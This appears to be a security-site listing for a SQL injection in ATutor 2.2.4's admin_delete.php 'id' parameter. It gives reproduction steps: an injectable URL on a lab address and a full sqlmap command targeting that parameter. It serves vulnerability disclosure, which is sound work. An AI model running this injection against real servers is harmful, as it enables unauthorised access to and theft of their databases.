ATutor 2.2.4 SQL Injection

2020.02.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: ATutor 2.2.4 - 'id' SQL Injection # Date: 2020-02-23 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://atutor.github.io/ # Software Link: https://sourceforge.net/projects/atutor/files/latest/download # Version: ATutor 2.2.4 # Tested on: LAMP on Ubuntu 18.04 Steps to Reproduce: 1) Login as admin user 2) Browse to the following URL: http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17' 3) Exploiting with SQLMAP: //Must supply valid User-Agent otherwise, there will be errors. sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --dbms=mysql -u "http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17*" --cookie=<COOKIES HERE>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top